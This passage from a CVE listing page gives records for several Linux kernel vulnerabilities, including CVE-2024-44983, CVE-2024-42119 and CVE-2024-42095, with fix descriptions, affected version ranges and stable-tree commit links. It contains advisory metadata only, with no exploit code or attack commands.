          "url": "https://git.kernel.org/stable/c/3c0da3d163eb32f1f91891efaade027fa9b245b9"
        },
        {
          "url": "https://project-zero.issues.chromium.org/issues/42451729"
        }
      ],
      "title": "fuse: Initialize beyond-EOF page contents before setting uptodate",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-44947",
    "datePublished": "2024-09-02T17:36:15.633Z",
    "dateReserved": "2024-08-21T05:34:56.665Z",
    "dateUpdated": "2025-11-03T22:13:54.619Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-44983 (GCVE-0-2024-44983)

Vulnerability from cvelistv5 – Published: 2024-09-04 19:54 – Updated: 2025-11-03 22:14

Title

netfilter: flowtable: validate vlan header

Summary

In the Linux kernel, the following vulnerability has been resolved: netfilter: flowtable: validate vlan header Ensure there is sufficient room to access the protocol field of the VLAN header, validate it once before the flowtable lookup. ===================================================== BUG: KMSAN: uninit-value in nf_flow_offload_inet_hook+0x45a/0x5f0 net/netfilter/nf_flow_table_inet.c:32 nf_flow_offload_inet_hook+0x45a/0x5f0 net/netfilter/nf_flow_table_inet.c:32 nf_hook_entry_hookfn include/linux/netfilter.h:154 [inline] nf_hook_slow+0xf4/0x400 net/netfilter/core.c:626 nf_hook_ingress include/linux/netfilter_netdev.h:34 [inline] nf_ingress net/core/dev.c:5440 [inline]

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/c05155cc455785916…
	https://git.kernel.org/stable/c/d9384ae7aec46036d…
	https://git.kernel.org/stable/c/0279c35d242d037ab…
	https://git.kernel.org/stable/c/043a18bb6cf16adaa…
	https://git.kernel.org/stable/c/6ea14ccb60c8ab829…

Impacted products

Vendor

Product

Version

Linux

Affected: 4cd91f7c290f64fe430867ddbae10bff34657b6a , < c05155cc455785916164aa5e1b4605a2ae946537 (git)
Affected: 4cd91f7c290f64fe430867ddbae10bff34657b6a , < d9384ae7aec46036d248d1c2c2757e471ab486c3 (git)
Affected: 4cd91f7c290f64fe430867ddbae10bff34657b6a , < 0279c35d242d037abeb73d60d06a6d1bb7f672d9 (git)
Affected: 4cd91f7c290f64fe430867ddbae10bff34657b6a , < 043a18bb6cf16adaa2f8642acfde6e8956a9caaa (git)
Affected: 4cd91f7c290f64fe430867ddbae10bff34657b6a , < 6ea14ccb60c8ab829349979b22b58a941ec4a3ee (git)

Linux

Affected: 5.13
Unaffected: 0 , < 5.13 (semver)
Unaffected: 5.15.166 , ≤ 5.15.* (semver)
Unaffected: 6.1.107 , ≤ 6.1.* (semver)
Unaffected: 6.6.48 , ≤ 6.6.* (semver)
Unaffected: 6.10.7 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:14:31.584Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/netfilter/nf_flow_table_inet.c",
            "net/netfilter/nf_flow_table_ip.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "c05155cc455785916164aa5e1b4605a2ae946537",
              "status": "affected",
              "version": "4cd91f7c290f64fe430867ddbae10bff34657b6a",
              "versionType": "git"
            },
            {
              "lessThan": "d9384ae7aec46036d248d1c2c2757e471ab486c3",
              "status": "affected",
              "version": "4cd91f7c290f64fe430867ddbae10bff34657b6a",
              "versionType": "git"
            },
            {
              "lessThan": "0279c35d242d037abeb73d60d06a6d1bb7f672d9",
              "status": "affected",
              "version": "4cd91f7c290f64fe430867ddbae10bff34657b6a",
              "versionType": "git"
            },
            {
              "lessThan": "043a18bb6cf16adaa2f8642acfde6e8956a9caaa",
              "status": "affected",
              "version": "4cd91f7c290f64fe430867ddbae10bff34657b6a",
              "versionType": "git"
            },
            {
              "lessThan": "6ea14ccb60c8ab829349979b22b58a941ec4a3ee",
              "status": "affected",
              "version": "4cd91f7c290f64fe430867ddbae10bff34657b6a",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/netfilter/nf_flow_table_inet.c",
            "net/netfilter/nf_flow_table_ip.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.13"
            },
            {
              "lessThan": "5.13",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.166",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.107",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.48",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.166",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.107",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.48",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.7",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: flowtable: validate vlan header\n\nEnsure there is sufficient room to access the protocol field of the\nVLAN header, validate it once before the flowtable lookup.\n\n=====================================================\nBUG: KMSAN: uninit-value in nf_flow_offload_inet_hook+0x45a/0x5f0 net/netfilter/nf_flow_table_inet.c:32\n nf_flow_offload_inet_hook+0x45a/0x5f0 net/netfilter/nf_flow_table_inet.c:32\n nf_hook_entry_hookfn include/linux/netfilter.h:154 [inline]\n nf_hook_slow+0xf4/0x400 net/netfilter/core.c:626\n nf_hook_ingress include/linux/netfilter_netdev.h:34 [inline]\n nf_ingress net/core/dev.c:5440 [inline]"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:30:18.420Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/c05155cc455785916164aa5e1b4605a2ae946537"
        },
        {
          "url": "https://git.kernel.org/stable/c/d9384ae7aec46036d248d1c2c2757e471ab486c3"
        },
        {
          "url": "https://git.kernel.org/stable/c/0279c35d242d037abeb73d60d06a6d1bb7f672d9"
        },
        {
          "url": "https://git.kernel.org/stable/c/043a18bb6cf16adaa2f8642acfde6e8956a9caaa"
        },
        {
          "url": "https://git.kernel.org/stable/c/6ea14ccb60c8ab829349979b22b58a941ec4a3ee"
        }
      ],
      "title": "netfilter: flowtable: validate vlan header",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-44983",
    "datePublished": "2024-09-04T19:54:32.830Z",
    "dateReserved": "2024-08-21T05:34:56.670Z",
    "dateUpdated": "2025-11-03T22:14:31.584Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42119 (GCVE-0-2024-42119)

Vulnerability from cvelistv5 – Published: 2024-07-30 07:46 – Updated: 2025-11-03 22:01

Title

drm/amd/display: Skip finding free audio for unknown engine_id

Summary

In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Skip finding free audio for unknown engine_id [WHY] ENGINE_ID_UNKNOWN = -1 and can not be used as an array index. Plus, it also means it is uninitialized and does not need free audio. [HOW] Skip and return NULL. This fixes 2 OVERRUN issues reported by Coverity.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/9eb4db08a808e3a3b…
	https://git.kernel.org/stable/c/eacca028a623f6086…
	https://git.kernel.org/stable/c/ffa7bd3ca9cfa902b…
	https://git.kernel.org/stable/c/afaaebdee9bb9f26d…
	https://git.kernel.org/stable/c/874261358d31fc772…
	https://git.kernel.org/stable/c/95ad20ee3c4efbb91…
	https://git.kernel.org/stable/c/881fb6afc0004c5e6…
	https://git.kernel.org/stable/c/1357b2165d9ad94fa…

Impacted products

Vendor

Product

Version

Linux

Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < 9eb4db08a808e3a3ba59193aeb84a57a6dc4d8c9 (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < eacca028a623f608607d02457122ee5284491e18 (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < ffa7bd3ca9cfa902b857d1dc9a5f46fededf86c8 (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < afaaebdee9bb9f26d9e13cc34b33bd0a7bf59488 (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < 874261358d31fc772f2823604167e670983cc1ca (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < 95ad20ee3c4efbb91f9a4ab08e070aa3697f5879 (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < 881fb6afc0004c5e6392ae2848f825bf051dae14 (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < 1357b2165d9ad94faa4c4a20d5e2ce29c2ff29c3 (git)

Linux

Affected: 4.15
Unaffected: 0 , < 4.15 (semver)
Unaffected: 4.19.318 , ≤ 4.19.* (semver)
Unaffected: 5.4.280 , ≤ 5.4.* (semver)
Unaffected: 5.10.222 , ≤ 5.10.* (semver)
Unaffected: 5.15.163 , ≤ 5.15.* (semver)
Unaffected: 6.1.98 , ≤ 6.1.* (semver)
Unaffected: 6.6.39 , ≤ 6.6.* (semver)
Unaffected: 6.9.9 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:01:51.528Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9eb4db08a808e3a3ba59193aeb84a57a6dc4d8c9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/eacca028a623f608607d02457122ee5284491e18"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ffa7bd3ca9cfa902b857d1dc9a5f46fededf86c8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/afaaebdee9bb9f26d9e13cc34b33bd0a7bf59488"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/874261358d31fc772f2823604167e670983cc1ca"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/95ad20ee3c4efbb91f9a4ab08e070aa3697f5879"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/881fb6afc0004c5e6392ae2848f825bf051dae14"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1357b2165d9ad94faa4c4a20d5e2ce29c2ff29c3"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42119",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:17:03.551339Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:05.530Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/display/dc/core/dc_resource.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "9eb4db08a808e3a3ba59193aeb84a57a6dc4d8c9",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "eacca028a623f608607d02457122ee5284491e18",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "ffa7bd3ca9cfa902b857d1dc9a5f46fededf86c8",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "afaaebdee9bb9f26d9e13cc34b33bd0a7bf59488",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "874261358d31fc772f2823604167e670983cc1ca",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "95ad20ee3c4efbb91f9a4ab08e070aa3697f5879",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "881fb6afc0004c5e6392ae2848f825bf051dae14",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "1357b2165d9ad94faa4c4a20d5e2ce29c2ff29c3",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/display/dc/core/dc_resource.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.15"
            },
            {
              "lessThan": "4.15",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.318",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.280",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.222",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.163",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.98",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.39",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.318",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.280",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.222",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.163",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.98",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.39",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.9",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/display: Skip finding free audio for unknown engine_id\n\n[WHY]\nENGINE_ID_UNKNOWN = -1 and can not be used as an array index. Plus, it\nalso means it is uninitialized and does not need free audio.\n\n[HOW]\nSkip and return NULL.\n\nThis fixes 2 OVERRUN issues reported by Coverity."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-07-11T17:19:56.516Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/9eb4db08a808e3a3ba59193aeb84a57a6dc4d8c9"
        },
        {
          "url": "https://git.kernel.org/stable/c/eacca028a623f608607d02457122ee5284491e18"
        },
        {
          "url": "https://git.kernel.org/stable/c/ffa7bd3ca9cfa902b857d1dc9a5f46fededf86c8"
        },
        {
          "url": "https://git.kernel.org/stable/c/afaaebdee9bb9f26d9e13cc34b33bd0a7bf59488"
        },
        {
          "url": "https://git.kernel.org/stable/c/874261358d31fc772f2823604167e670983cc1ca"
        },
        {
          "url": "https://git.kernel.org/stable/c/95ad20ee3c4efbb91f9a4ab08e070aa3697f5879"
        },
        {
          "url": "https://git.kernel.org/stable/c/881fb6afc0004c5e6392ae2848f825bf051dae14"
        },
        {
          "url": "https://git.kernel.org/stable/c/1357b2165d9ad94faa4c4a20d5e2ce29c2ff29c3"
        }
      ],
      "title": "drm/amd/display: Skip finding free audio for unknown engine_id",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42119",
    "datePublished": "2024-07-30T07:46:11.314Z",
    "dateReserved": "2024-07-29T15:50:41.178Z",
    "dateUpdated": "2025-11-03T22:01:51.528Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42095 (GCVE-0-2024-42095)

Vulnerability from cvelistv5 – Published: 2024-07-29 17:39 – Updated: 2025-11-03 22:01

Title

serial: 8250_omap: Implementation of Errata i2310

Summary

In the Linux kernel, the following vulnerability has been resolved: serial: 8250_omap: Implementation of Errata i2310 As per Errata i2310[0], Erroneous timeout can be triggered, if this Erroneous interrupt is not cleared then it may leads to storm of interrupts, therefore apply Errata i2310 solution. [0] https://www.ti.com/lit/pdf/sprz536 page 23

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/cb879300669881970…
	https://git.kernel.org/stable/c/87257a28271c828a9…
	https://git.kernel.org/stable/c/98840e410d53329f5…
	https://git.kernel.org/stable/c/e67d7f38008e56fb6…
	https://git.kernel.org/stable/c/6270051f656004ca5…
	https://git.kernel.org/stable/c/9d141c1e615795eeb…

Impacted products

Vendor

Product

Version

Linux

Affected: 9443acbd251f366804b20a27be72ba67df532cb1 , < cb879300669881970eabebe64bd509dbbe42b9de (git)
Affected: b67e830d38fa9335d927fe67e812e3ed81b4689c , < 87257a28271c828a98f762bf2dd803c1793d2b5b (git)
Affected: b67e830d38fa9335d927fe67e812e3ed81b4689c , < 98840e410d53329f5331ecdce095e740791963d0 (git)
Affected: b67e830d38fa9335d927fe67e812e3ed81b4689c , < e67d7f38008e56fb691b6a72cadf16c107c2f48b (git)
Affected: b67e830d38fa9335d927fe67e812e3ed81b4689c , < 6270051f656004ca5cde644c73cb1fa4d718792e (git)
Affected: b67e830d38fa9335d927fe67e812e3ed81b4689c , < 9d141c1e615795eeb93cd35501ad144ee997a826 (git)
Affected: bf1bcca53c35a40976afbdd40aaea9424154f57b (git)
Affected: ed87ec89b7f6071de06380a0216e6aa420eb9742 (git)

Linux

Affected: 5.14
Unaffected: 0 , < 5.14 (semver)
Unaffected: 5.10.221 , ≤ 5.10.* (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.97 , ≤ 6.1.* (semver)
Unaffected: 6.6.37 , ≤ 6.6.* (semver)
Unaffected: 6.9.8 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:01:29.111Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cb879300669881970eabebe64bd509dbbe42b9de"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/87257a28271c828a98f762bf2dd803c1793d2b5b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/98840e410d53329f5331ecdce095e740791963d0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e67d7f38008e56fb691b6a72cadf16c107c2f48b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6270051f656004ca5cde644c73cb1fa4d718792e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9d141c1e615795eeb93cd35501ad144ee997a826"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42095",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:18:24.897254Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:00.606Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/tty/serial/8250/8250_omap.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "cb879300669881970eabebe64bd509dbbe42b9de",
              "status": "affected",
              "version": "9443acbd251f366804b20a27be72ba67df532cb1",
              "versionType": "git"
            },
            {
              "lessThan": "87257a28271c828a98f762bf2dd803c1793d2b5b",
              "status": "affected",
              "version": "b67e830d38fa9335d927fe67e812e3ed81b4689c",
              "versionType": "git"
            },
            {
              "lessThan": "98840e410d53329f5331ecdce095e740791963d0",
              "status": "affected",
              "version": "b67e830d38fa9335d927fe67e812e3ed81b4689c",
              "versionType": "git"
            },
            {
              "lessThan": "e67d7f38008e56fb691b6a72cadf16c107c2f48b",
              "status": "affected",
              "version": "b67e830d38fa9335d927fe67e812e3ed81b4689c",
              "versionType": "git"
            },
            {
              "lessThan": "6270051f656004ca5cde644c73cb1fa4d718792e",
              "status": "affected",
              "version": "b67e830d38fa9335d927fe67e812e3ed81b4689c",
              "versionType": "git"
            },
            {
              "lessThan": "9d141c1e615795eeb93cd35501ad144ee997a826",
              "status": "affected",
              "version": "b67e830d38fa9335d927fe67e812e3ed81b4689c",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "bf1bcca53c35a40976afbdd40aaea9424154f57b",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "ed87ec89b7f6071de06380a0216e6aa420eb9742",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/tty/serial/8250/8250_omap.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.14"
            },
            {
              "lessThan": "5.14",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.221",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.97",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.37",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.221",
                  "versionStartIncluding": "5.10.50",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.97",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.37",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.8",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.12.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.13.2",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nserial: 8250_omap: Implementation of Errata i2310\n\nAs per Errata i2310[0], Erroneous timeout can be triggered,\nif this Erroneous interrupt is not cleared then it may leads\nto storm of interrupts, therefore apply Errata i2310 solution.\n\n[0] https://www.ti.com/lit/pdf/sprz536 page 23"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:57:35.598Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
